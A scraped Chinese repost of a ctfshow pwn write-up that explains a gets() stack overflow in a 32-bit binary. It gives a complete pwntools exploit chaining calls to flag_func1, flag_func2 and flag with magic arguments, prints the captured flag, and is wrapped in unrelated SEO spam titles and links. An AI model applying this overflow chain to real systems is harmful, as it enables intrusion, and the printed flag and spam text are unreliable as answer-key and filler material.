当前位置: 首页 > news >正文

英文b2c网站建设民生热点新闻

英文b2c网站建设,民生热点新闻,wordpress视频自适应代码,宿迁网站建设公司你是我的谁,我的我是你的谁 32 位程序,开启 NX 保护 看主函数 跟进 ctfshow 函数 gets 存在溢出 注意到有三个与 flag 相关的函数 先看 flag 函数 输出 flag 的条件: if ( flag1 && flag2 && a1 0xBDBDBDBD ) 看 flag_fu…

你是我的谁,我的我是你的谁

32 位程序,开启 NX 保护

看主函数

跟进 ctfshow 函数

gets 存在溢出

注意到有三个与 flag 相关的函数

先看 flag 函数

输出 flag 的条件:

 if ( flag1 && flag2 && a1 == 0xBDBDBDBD )

看 flag_func1 函数

会直接将 flag1 置 1

看 flag_func2 函数

flag2 置 1 的条件

  if ( flag1 && a1 == 0xACACACAC )

那么思路就很清晰了,溢出后先跳到 flag_func1,将 flag1 置 1

再跳到 flag_func2,满足条件让 flag2 置 1

最后跳到 flag 函数,满足条件读取打印 flag

写 exp:

# @author:My6n
# @time:20250614
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28295)elf = ELF('./pwn')
flag_addr = elf.sym['flag']
flag1_addr = elf.sym['flag_func1']
flag2_addr = elf.sym['flag_func2']payload = cyclic(0x2c+4)
payload += p32(flag1_addr) 
payload += p32(flag2_addr) 
payload += p32(flag_addr)
payload += p32(0xACACACAC) + p32(0xBDBDBDBD)io.sendlineafter('Input your flag: ',payload)io.interactive()

没有问题

拿到 flag: ctfshow{e4a15f8b-48a0-46ce-9783-7fa48bef281a}

http://www.tj-hxxt.cn/news/126599.html

相关文章:

  • 蚌埠 网站制作网站seo优化徐州百度网络
  • 网站建设销售客户疑问微信推广软件
  • 在哪个网站做兼职淘宝客服谷歌浏览器官方app下载
  • 网站做调查需要考虑的内容专业网络推广
  • 做神马网站快速排网站推广和宣传的方法
  • dw做的网站能直接使用吗公司做网站推广
  • 做网站用微软雅黑百度公司好进吗
  • 微信网站如何开发广州seo推广公司
  • 惠东网站建设营销软件商城
  • 时时彩网站建设teafly计算机培训课程
  • 网站后台jsp怎么做分页流量平台排名
  • 邯郸网站设计哪家好直通车关键词优化口诀
  • 做国外营销型网站seo最新技巧
  • 蓬莱做网站高清免费观看电视网站
  • wordpress 图文列表企业网站seo贵不贵
  • 专业做网站建设 昆山微信营销模式
  • wordpress自定义评论样式seo如何优化关键词排名
  • 挖金矿游戏网站建设云巅seo
  • 在哪个网站做一件代发靠谱网络顾问
  • 东莞网站建设0086如何制作一个网页网站
  • 做煤网站如何制定会员营销方案
  • 建设银行网站信任产品推广平台有哪些
  • 怎么样做团购网站沧州百度推广公司
  • c2c网站建设方案如何做好企业推广
  • 上海做公司网站的公司app推广方法
  • 可以自己做网站这么做网站设计软件
  • 微网站首页栾城seo整站排名
  • 专做中医教学网站互联网营销方案
  • 福州手机建站模板百度指数平台官网
  • 浙江省建设安监站网站外贸获客软件